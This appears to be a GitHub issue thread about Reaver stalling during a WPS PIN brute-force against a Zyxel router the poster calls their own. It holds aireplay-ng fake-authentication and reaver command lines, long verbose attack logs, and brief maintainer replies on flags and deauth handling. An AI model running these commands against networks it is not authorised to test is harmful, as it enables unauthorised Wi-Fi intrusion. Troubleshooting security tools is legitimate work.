Reaver session gets stuck at "send_packet called from resend_last_packet() send.c:161"

[mkarne1]

Hi there,

my reaver session always gets stuck at "send_packet called from resend_last_packet() send.c:161" while cracking my WPS network with the following settings:

I'm using:

Reaver version: 1.6.6 Wireless Adapter: Alfa AWUS036ACH Host OS: macOS BigSur VMware Fusion with: Linux kali 6.1.0-kali7-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.20-1kali1 (2023-03-22) x86_64 GNU/Linux

Here are the commands that I'm running + their output:

Thanks in advance & best regards!

──(root㉿kali)-[~]
└─# aireplay-ng --fakeauth 100 -a D4:3D:F3:XX:XX:XX -h EA:E1:A1:XX:XX:XX wlan0
11:39:20  Waiting for beacon frame (BSSID: D4:3D:F3:XX:XX:XX1) on channel 8

11:39:20  Sending Authentication Request (Open System) [ACK]
11:39:20  Authentication successful
11:39:20  Sending Association Request [ACK]
11:39:20  Association successful :-) (AID: 1)

11:39:34  Got a deauthentication packet! (Waiting 3 seconds)

11:39:37  Sending Authentication Request (Open System) [ACK]
11:39:38  Got a deauthentication packet! (Waiting 5 seconds)

11:39:43  Sending Authentication Request (Open System) [ACK]
11:39:43  Authentication successful
11:39:43  Sending Association Request [ACK]
11:39:43  Got a deauthentication packet! (Waiting 7 seconds)

11:39:50  Sending Authentication Request (Open System) [ACK]
11:39:50  Got a deauthentication packet! (Waiting 9 seconds)

11:39:59  Sending Authentication Request (Open System) [ACK]
11:39:59  Got a deauthentication packet! (Waiting 11 seconds)

11:40:10  Sending Authentication Request (Open System) [ACK]
11:40:10  Got a deauthentication packet! (Waiting 13 seconds)

11:40:23  Sending Authentication Request (Open System) [ACK]
11:40:24  Authentication successful
11:40:24  Sending Association Request [ACK]
11:40:24  Association successful :-) (AID: 1)

11:40:39  Sending keep-alive packet [ACK]
11:40:54  Sending keep-alive packet [ACK]
11:41:09  Sending keep-alive packet [ACK]^C

──(root㉿kali)-[~]
└─# reaver --bssid D4:3D:F3:XX:XX:XX --channel 8 --interface wlan0 -vvv --no-associate

Reaver v1.6.6 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Switching wlan0 to channel 8
[?] Restore previous session for D4:3D:F3:XX:XX:XX? [n/Y] n
[+] Waiting for beacon from D4:3D:F3:XX:XX:XX
[+] Received beacon from D4:3D:F3:XX:XX:XX
[+] Vendor: RalinkTe
WPS: A new PIN configured (timeout=0)
WPS: UUID - hexdump(len=16): [NULL]
WPS: PIN - hexdump_ascii(len=8):
     31 32 33 34 35 36 37 30                           12345670        
WPS: Selected registrar information changed
WPS: Internal Registrar selected (pbc=0)
WPS: sel_reg_union
WPS: set_ie
WPS: cb_set_sel_reg
WPS: Enter wps_cg_set_sel_reg
WPS: Leave wps_cg_set_sel_reg early
WPS: return from wps_selected_registrar_changed
[+] Trying pin "12345670"
[+] Associated with D4:3D:F3:XX:XX:XX (ESSID: Zyxel_F391)
[+] Sending EAPOL START request
send_packet called from send_eapol_start() send.c:48
send_packet called from resend_last_packet() send.c:161
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
WPS: Processing received message (len=396 op_code=4)
WPS: Received WSC_MSG
WPS: Unsupported attribute type 0x1049 len=6
WPS: Parsed WSC_MSG
WPS: Received M1
WPS: UUID-E - hexdump(len=16): bc 32 9e 00 1d d8 11 b2 86 01 d4 3d f3 74 f3 92
WPS: Enrollee MAC Address D4:3D:F3:XX:XX:XX
WPS: Enrollee Nonce - hexdump(len=16): bc 7d a1 e8 88 31 91 ed 25 76 dd 71 48 21 2c 8c
WPS: Enrollee Authentication Type flags 0x21
WPS: No match in supported authentication types (own 0x0 Enrollee 0x21)
WPS: Workaround - assume Enrollee does not advertise supported authentication types correctly
WPS: Enrollee Encryption Type flags 0x9
WPS: No match in supported encryption types (own 0x0 Enrollee 0x9)
WPS: Workaround - assume Enrollee does not advertise supported encryption types correctly
WPS: Enrollee Connection Type flags 0x1
WPS: Enrollee Config Methods 0x238c [Label] [Display] [PBC] [Keypad]
WPS: Enrollee Wi-Fi Protected Setup State 2
WPS: Manufacturer - hexdump_ascii(len=5):
     5a 59 58 45 4c                                    ZYXEL           
WPS: Model Name - hexdump_ascii(len=12):
     56 4d 47 33 36 32 35 2d 54 35 30 42               VMG3625-T50B    
WPS: Model Number - hexdump_ascii(len=6):
     52 54 32 38 36 30                                 RT2860          
WPS: Serial Number - hexdump_ascii(len=4):
     31 32 33 34                                       1234            
WPS: Primary Device Type: 6-0050F204-1
WPS: Device Name - hexdump_ascii(len=12):
     56 4d 47 33 36 32 35 2d 54 35 30 42               VMG3625-T50B    
WPS: Enrollee RF Bands 0x1
WPS: Enrollee Association State 0
WPS: Device Password ID 0
WPS: Enrollee Configuration Error 0
WPS: OS Version 80000000
WPS: M1 Processed
WPS: dev_pw_id checked
WPS: PBC Checked
WPS: Entering State SEND_M2
WPS: WPS_CONTINUE, Freeing Last Message
WPS: WPS_CONTINUE, Saving Last Message
WPS: returning
[+] Received M1 message
WPS: Found a wildcard PIN. Assigned it for this UUID-E
WPS: Registrar Nonce - hexdump(len=16): 2c 45 b7 c6 12 06 ae 89 37 a9 89 12 83 57 ab 51
WPS: UUID-R - hexdump(len=16): 38 9f d4 2c db bd 7f 6d 31 89 52 dd cf 67 aa c2
WPS: Building Message M2
WPS:  * Version
WPS:  * Message Type (5)
WPS:  * Enrollee Nonce
WPS:  * Registrar Nonce
WPS:  * UUID-R
WPS:  * Public Key
WPS: Generate new DH keys
DH: private value - hexdump(len=192): f8 2f b8 8e 73 c3 42 5d 71 99 ea 1e 31 bf 3b f0 d3 ff 71 55 42 ab 84 1d 7d ff a3 eb fc da 2f 9b 4e 9b 1d df 9b 51 b0 d1 af 4e 90 0f 4c 97 f7 b2 74 a9 63 a2 8e 2e a3 c8 1f 71 7b 39 0d 20 5a 06 3a 68 56 e6 59 8a a0 74 f5 40 a5 ab 89 ed 67 6a 1e c1 4a c7 aa 88 b1 61 89 b4 6b 6a 66 92 dd cd a7 a0 fc 43 54 fa a3 03 4b e9 0d 9d e0 3b 18 31 ae 33 e2 2c 33 ba 89 0e 3b 1a 49 02 a8 3f 76 aa e4 69 df 48 11 c9 0d bf b5 07 0e 86 15 ad af c3 58 92 53 d7 cb e1 83 9b 80 47 58 44 78 ec 37 f2 c7 24 13 af 3d 2e 88 92 3e 0d 03 86 e0 87 64 99 13 19 66 ce 79 15 31 e9 1e 30 1c 7a 1b 57 97 16
DH: public value - hexdump(len=192): 26 b5 91 d1 70 d2 c4 30 d4 cb d5 e5 16 fe ab a4 1a 44 e3 f9 a1 5a 36 20 8a 9e ef 49 66 37 5d f9 25 05 28 0f 06 01 e6 3c 78 85 1b f5 82 78 60 75 35 f1 bc 72 2f 01 0a 30 7e 71 14 b5 ae 52 33 9d 3f 56 a1 2d b1 3f fc 87 90 30 89 b4 d8 4a 5f ec ad d1 28 39 c3 0b 6f 9b a8 c2 27 07 64 94 4e c9 75 a4 9b ba 06 ff 7f be 55 a8 02 b5 a0 9d ad a4 f3 e8 4e 42 56 31 c8 e5 f7 5a 27 40 5d d4 a2 b6 04 fe 71 e8 dc 50 2e 8f de 77 94 3e 0c 34 82 76 c5 d9 b5 1c c2 38 e7 d9 e9 4f 2f 51 7e 3e 4a 0f 92 ec ac ab d2 28 28 41 f6 61 3f 04 04 7e 48 17 f1 01 ed 7c b7 a5 f5 59 79 62 46 08 ce 95 5b 9b
WPS: DH Private Key - hexdump(len=192): f8 2f b8 8e 73 c3 42 5d 71 99 ea 1e 31 bf 3b f0 d3 ff 71 55 42 ab 84 1d 7d ff a3 eb fc da 2f 9b 4e 9b 1d df 9b 51 b0 d1 af 4e 90 0f 4c 97 f7 b2 74 a9 63 a2 8e 2e a3 c8 1f 71 7b 39 0d 20 5a 06 3a 68 56 e6 59 8a a0 74 f5 40 a5 ab 89 ed 67 6a 1e c1 4a c7 aa 88 b1 61 89 b4 6b 6a 66 92 dd cd a7 a0 fc 43 54 fa a3 03 4b e9 0d 9d e0 3b 18 31 ae 33 e2 2c 33 ba 89 0e 3b 1a 49 02 a8 3f 76 aa e4 69 df 48 11 c9 0d bf b5 07 0e 86 15 ad af c3 58 92 53 d7 cb e1 83 9b 80 47 58 44 78 ec 37 f2 c7 24 13 af 3d 2e 88 92 3e 0d 03 86 e0 87 64 99 13 19 66 ce 79 15 31 e9 1e 30 1c 7a 1b 57 97 16
WPS: DH own Public Key - hexdump(len=192): 26 b5 91 d1 70 d2 c4 30 d4 cb d5 e5 16 fe ab a4 1a 44 e3 f9 a1 5a 36 20 8a 9e ef 49 66 37 5d f9 25 05 28 0f 06 01 e6 3c 78 85 1b f5 82 78 60 75 35 f1 bc 72 2f 01 0a 30 7e 71 14 b5 ae 52 33 9d 3f 56 a1 2d b1 3f fc 87 90 30 89 b4 d8 4a 5f ec ad d1 28 39 c3 0b 6f 9b a8 c2 27 07 64 94 4e c9 75 a4 9b ba 06 ff 7f be 55 a8 02 b5 a0 9d ad a4 f3 e8 4e 42 56 31 c8 e5 f7 5a 27 40 5d d4 a2 b6 04 fe 71 e8 dc 50 2e 8f de 77 94 3e 0c 34 82 76 c5 d9 b5 1c c2 38 e7 d9 e9 4f 2f 51 7e 3e 4a 0f 92 ec ac ab d2 28 28 41 f6 61 3f 04 04 7e 48 17 f1 01 ed 7c b7 a5 f5 59 79 62 46 08 ce 95 5b 9b
WPS: DH Private Key - hexdump(len=192): f8 2f b8 8e 73 c3 42 5d 71 99 ea 1e 31 bf 3b f0 d3 ff 71 55 42 ab 84 1d 7d ff a3 eb fc da 2f 9b 4e 9b 1d df 9b 51 b0 d1 af 4e 90 0f 4c 97 f7 b2 74 a9 63 a2 8e 2e a3 c8 1f 71 7b 39 0d 20 5a 06 3a 68 56 e6 59 8a a0 74 f5 40 a5 ab 89 ed 67 6a 1e c1 4a c7 aa 88 b1 61 89 b4 6b 6a 66 92 dd cd a7 a0 fc 43 54 fa a3 03 4b e9 0d 9d e0 3b 18 31 ae 33 e2 2c 33 ba 89 0e 3b 1a 49 02 a8 3f 76 aa e4 69 df 48 11 c9 0d bf b5 07 0e 86 15 ad af c3 58 92 53 d7 cb e1 83 9b 80 47 58 44 78 ec 37 f2 c7 24 13 af 3d 2e 88 92 3e 0d 03 86 e0 87 64 99 13 19 66 ce 79 15 31 e9 1e 30 1c 7a 1b 57 97 16
WPS: DH peer Public Key - hexdump(len=192): bd c4 1c 6a 9e 9f 72 fb a1 65 9e 85 24 e7 37 0c 4d be 9c 60 5e 32 57 aa 7a cb ba 37 98 a0 cd 2a c4 9e 33 84 f9 53 a1 be fc 76 88 c7 d3 0f 44 b8 05 45 36 e4 97 9b 68 04 63 84 2e 7e 0c ee c1 4b 14 11 3d 56 f0 84 7a b5 72 9c 40 5d b9 bd fe 87 a8 24 46 9f 58 0a 43 c9 c6 8f 02 2b 39 2b 45 4b bd 1a a7 62 b2 45 d4 50 3a 74 22 ca 6c 85 52 d7 05 7d 9c 43 24 a2 69 8d d3 59 31 38 34 a6 2f 70 4e 6e 6c 72 dc 0f ab 30 84 32 05 6f 00 0c 65 cb 09 ef f6 8c 56 44 ed d8 92 f8 7f 8d 75 bd 8a b0 53 41 1f 3d 7a b9 c6 f5 93 ee 82 ab e7 9d df 9f 7b cb e9 0c 1c 14 5c ae cd c8 6b a0 1e 2b 2e 1d
DH: shared key - hexdump(len=192): 81 ed 5a cb 2d d9 77 ae 4f fa c7 89 47 bb eb 35 5b fe 26 3d 28 d8 d1 af bc 0b a7 f9 63 75 3b 26 f1 6f f8 8a 75 26 e7 ac 03 2c 74 9f 77 1c 77 ca 52 cf 33 62 e3 e1 f7 e8 8a fe bc f5 6c 9c ed 63 11 41 91 dc f6 18 fd 41 f8 b1 3d 64 dd ed 3e 77 7d 66 83 63 57 07 35 d4 c7 f8 cd 1e 1a 4a ac 78 8c 39 fc b1 bc f5 d2 d9 8f ea 21 3d 39 d5 18 66 1a aa 3e 97 d4 e2 bc df 02 f5 8f dc c7 ca bf 16 bc 1c d2 e2 26 11 6d 5d f0 ce b6 7d 01 1a 8b 45 1c a9 cf f1 e7 51 7d ea 45 38 aa e8 10 55 8a 99 be b0 7e 2a 00 97 79 7b e7 2f e6 c2 45 ec aa 34 78 c5 08 8b 43 75 64 0e 47 e7 1f 33 34 e2 e6 49
WPS: DH shared key - hexdump(len=192): 81 ed 5a cb 2d d9 77 ae 4f fa c7 89 47 bb eb 35 5b fe 26 3d 28 d8 d1 af bc 0b a7 f9 63 75 3b 26 f1 6f f8 8a 75 26 e7 ac 03 2c 74 9f 77 1c 77 ca 52 cf 33 62 e3 e1 f7 e8 8a fe bc f5 6c 9c ed 63 11 41 91 dc f6 18 fd 41 f8 b1 3d 64 dd ed 3e 77 7d 66 83 63 57 07 35 d4 c7 f8 cd 1e 1a 4a ac 78 8c 39 fc b1 bc f5 d2 d9 8f ea 21 3d 39 d5 18 66 1a aa 3e 97 d4 e2 bc df 02 f5 8f dc c7 ca bf 16 bc 1c d2 e2 26 11 6d 5d f0 ce b6 7d 01 1a 8b 45 1c a9 cf f1 e7 51 7d ea 45 38 aa e8 10 55 8a 99 be b0 7e 2a 00 97 79 7b e7 2f e6 c2 45 ec aa 34 78 c5 08 8b 43 75 64 0e 47 e7 1f 33 34 e2 e6 49
WPS: DHKey - hexdump(len=32): 29 45 f8 22 8b 9d 38 d3 15 00 18 29 70 a6 7c 16 e5 c0 0c 33 a4 4e ba 49 2e f5 45 df 61 bf 2f b7
WPS: KDK - hexdump(len=32): d2 7e 63 74 b0 c4 4e f8 20 96 e7 21 39 ee 4b 08 c4 59 3d b9 ca 3f 72 f5 50 a3 e2 bd c5 bb 52 31
WPS: AuthKey - hexdump(len=32): 14 cc 24 89 8b 82 f0 b0 b5 b9 e0 aa 5f f7 d6 33 37 d4 b1 42 95 c6 6c 9f 7f da a6 18 6e b8 4b 94
WPS: KeyWrapKey - hexdump(len=16): 1a a0 db 6b 60 b7 04 01 d1 91 e4 ba ed c3 d6 08
WPS: EMSK - hexdump(len=32): 53 3e 4b f8 15 00 1c 4e ff ef 69 b5 f1 2f d1 5c b1 87 bc e8 7f 1f 7a 8b 35 73 eb 19 02 df 2f 13
WPS:  * Authentication Type Flags
WPS:  * Encryption Type Flags
WPS:  * Connection Type Flags
WPS:  * Config Methods (8c)
WPS:  * Manufacturer
WPS:  * Model Name
WPS:  * Model Number
WPS:  * Serial Number
WPS:  * Primary Device Type
WPS:  * Device Name
WPS:  * RF Bands (0)
WPS:  * Association State
WPS:  * Configuration Error (0)
WPS:  * Device Password ID (0)
WPS:  * OS Version
WPS:  * Authenticator
[+] Sending M2 message
send_packet called from send_msg() send.c:116
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
WPS: Processing received message (len=124 op_code=4)
WPS: Received WSC_MSG
WPS: Unsupported attribute type 0x1049 len=6
WPS: Parsed WSC_MSG
WPS: Received M3
WPS: E-Hash1 - hexdump(len=32): 84 d4 6f d4 98 bc 96 b1 19 46 bc 56 92 1c 77 70 80 c8 84 b5 62 4e 2b f0 08 da 9d 11 22 7c 18 9c
WPS: E-Hash2 - hexdump(len=32): 47 84 4a 19 f1 db 4e 01 20 38 22 78 ec 08 24 ed 22 c9 b8 cb 77 36 eb 75 8e 16 67 97 fe 92 80 9a
WPS: WPS_CONTINUE, Freeing Last Message
WPS: WPS_CONTINUE, Saving Last Message
WPS: returning
[+] Received M3 message
WPS: Building Message M4
WPS: Dev Password Len: 8
WPS: Dev Password: 12345670��2�
WPS: Device Password - hexdump_ascii(len=8):
     31 32 33 34 35 36 37 30                           12345670        
WPS: PSK1 - hexdump(len=16): 9d 48 0d 27 c7 75 e3 c2 67 20 18 a3 af 2e ec ce
WPS: PSK2 - hexdump(len=16): d4 0d 0f ac 46 35 32 12 cf ce d1 2e 50 f7 bb d4
Allocs OK, building M4 packet
WPS:  * Version
WPS:  * Message Type (8)
WPS:  * Enrollee Nonce
WPS: R-S1 - hexdump(len=16): 3f d1 fb 56 12 77 3d 75 9c 34 90 0a 1e 0d 3c ee
WPS: R-S2 - hexdump(len=16): 33 8b d6 89 88 9a 67 77 56 35 5d 0a 57 50 c6 47
WPS:  * R-Hash1
WPS: R-Hash1 - hexdump(len=32): bc c4 c2 d0 d1 bd 87 56 36 d5 55 a9 99 81 ee 7f d8 9b e3 dc 16 01 39 35 2e b8 f2 b1 07 8e d8 e2
WPS:  * R-Hash2
WPS: R-Hash2 - hexdump(len=32): 98 42 a1 41 aa e8 a4 63 27 ca 9d db d5 a2 e6 31 03 e6 4f ad 14 a3 61 53 f9 92 ed fe 25 f4 78 22
WPS:  * R-SNonce1
WPS:  * Key Wrap Authenticator
WPS:  * Encrypted Settings
WPS:  * Authenticator
[+] Sending M4 message
send_packet called from send_msg() send.c:116
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
WPS: Processing received message (len=66 op_code=3)
WPS: Received WSC_NACK
WPS: Unsupported attribute type 0x1049 len=6
WPS: Enrollee terminated negotiation with Configuration Error 18
[+] Received WSC NACK
WPS: Building Message WSC_NACK
WPS:  * Version
WPS:  * Message Type (14)
WPS:  * Enrollee Nonce
WPS:  * Registrar Nonce
WPS:  * Configuration Error (0)
[+] Sending WSC NACK
send_packet called from send_msg() send.c:116
WPS: Invalidating used wildcard PIN
WPS: Invalidated PIN for UUID - hexdump(len=16): bc 32 9e 00 1d d8 11 b2 86 01 d4 3d f3 74 f3 92
WPS: A new PIN configured (timeout=0)
WPS: UUID - hexdump(len=16): [NULL]
WPS: PIN - hexdump_ascii(len=8):
     30 30 30 30 35 36 37 38                           00005678        
WPS: Selected registrar information changed
WPS: Internal Registrar selected (pbc=0)
WPS: sel_reg_union
WPS: set_ie
WPS: cb_set_sel_reg
WPS: Enter wps_cg_set_sel_reg
WPS: Leave wps_cg_set_sel_reg early
WPS: return from wps_selected_registrar_changed
[+] Trying pin "00005678"
[+] Associated with D4:3D:F3:XX:XX:XX (ESSID: Zyxel_F391)
[+] Sending EAPOL START request
send_packet called from send_eapol_start() send.c:48
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
[+] Received deauth request
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
send_packet called from send_eapol_start() send.c:48
[+] Received deauth request
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
send_packet called from send_eapol_start() send.c:48
[+] Received deauth request
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
send_packet called from send_eapol_start() send.c:48
send_packet called from resend_last_packet() send.c:161
[+] Received deauth request
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
^Csend_packet called from send_termination() send.c:142

[+] Session saved.

[soxrok2212]

Try with the -N flag

[rofl0r]

we haven't yet decided how to handle deauth requests. i guess in bruteforce mode it would be best to send deauth, and start over (including auth, assoc) with the current pin.

[mkarne1]

Try with the -N flag

@soxrok2212 I just tried it, but unfortunately I get the same result. You can find the output below. Nevertheless, thanks for your help!

─(root㉿kali)-[~]
└─# aireplay-ng --fakeauth 100 -a D4:3D:F3:XX:XX:XX -h 06:AE:XX:XX:XX:XX wlan0
17:47:52  Waiting for beacon frame (BSSID: D4:3D:F3:XX:XX:XX) on channel 5

17:47:52  Sending Authentication Request (Open System)

17:47:54  Sending Authentication Request (Open System) [ACK]
17:47:54  Authentication successful
17:47:54  Sending Association Request [ACK]
17:47:55  Association successful :-) (AID: 1)

17:48:01  Got a deauthentication packet! (Waiting 3 seconds)

17:48:04  Sending Authentication Request (Open System) [ACK]
17:48:04  Got a deauthentication packet! (Waiting 5 seconds)

17:48:09  Sending Authentication Request (Open System) [ACK]
17:48:09  Got a deauthentication packet! (Waiting 7 seconds)

17:48:16  Sending Authentication Request (Open System) [ACK]
17:48:17  Got a deauthentication packet! (Waiting 9 seconds)

17:48:26  Sending Authentication Request (Open System) [ACK]
17:48:26  Got a deauthentication packet! (Waiting 11 seconds)

(root㉿kali)-[~]
└─# reaver --bssid D4:3D:F3:XX:XX:XX --channel 5 --interface wlan0 -vvv --no-associate -N

Reaver v1.6.6 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Switching wlan0 to channel 5
[?] Restore previous session for D4:3D:F3:XX:XX:XX? [n/Y] n
[+] Waiting for beacon from D4:3D:F3:XX:XX:XX
[+] Received beacon from D4:3D:F3:XX:XX:XX
[+] Vendor: RalinkTe
WPS: A new PIN configured (timeout=0)
WPS: UUID - hexdump(len=16): [NULL]
WPS: PIN - hexdump_ascii(len=8):
     31 32 33 34 35 36 37 30                           12345670        
WPS: Selected registrar information changed
WPS: Internal Registrar selected (pbc=0)
WPS: sel_reg_union
WPS: set_ie
WPS: cb_set_sel_reg
WPS: Enter wps_cg_set_sel_reg
WPS: Leave wps_cg_set_sel_reg early
WPS: return from wps_selected_registrar_changed
[+] Trying pin "12345670"
[+] Associated with D4:3D:F3:XX:XX:XX (ESSID: Zyxel_F391)
[+] Sending EAPOL START request
send_packet called from send_eapol_start() send.c:48
send_packet called from resend_last_packet() send.c:161
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
send_packet called from resend_last_packet() send.c:161
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
send_packet called from resend_last_packet() send.c:161
WPS: Processing received message (len=396 op_code=4)
WPS: Received WSC_MSG
WPS: Unsupported attribute type 0x1049 len=6
WPS: Parsed WSC_MSG
WPS: Received M1
WPS: UUID-E - hexdump(len=16): bc 32 9e 00 1d d8 11 b2 86 01 d4 3d f3 74 f3 92
WPS: Enrollee MAC Address D4:3D:F3:XX:XX:XX
WPS: Enrollee Nonce - hexdump(len=16): 2c 44 dc 84 32 e0 89 99 5f 84 b4 21 fb c8 4c ca
WPS: Enrollee Authentication Type flags 0x21
WPS: No match in supported authentication types (own 0x0 Enrollee 0x21)
WPS: Workaround - assume Enrollee does not advertise supported authentication types correctly
WPS: Enrollee Encryption Type flags 0x9
WPS: No match in supported encryption types (own 0x0 Enrollee 0x9)
WPS: Workaround - assume Enrollee does not advertise supported encryption types correctly
WPS: Enrollee Connection Type flags 0x1
WPS: Enrollee Config Methods 0x238c [Label] [Display] [PBC] [Keypad]
WPS: Enrollee Wi-Fi Protected Setup State 2
WPS: Manufacturer - hexdump_ascii(len=5):
     5a 59 58 45 4c                                    ZYXEL           
WPS: Model Name - hexdump_ascii(len=12):
     56 4d 47 33 36 32 35 2d 54 35 30 42               VMG3625-T50B    
WPS: Model Number - hexdump_ascii(len=6):
     52 54 32 38 36 30                                 RT2860          
WPS: Serial Number - hexdump_ascii(len=4):
     31 32 33 34                                       1234            
WPS: Primary Device Type: 6-0050F204-1
WPS: Device Name - hexdump_ascii(len=12):
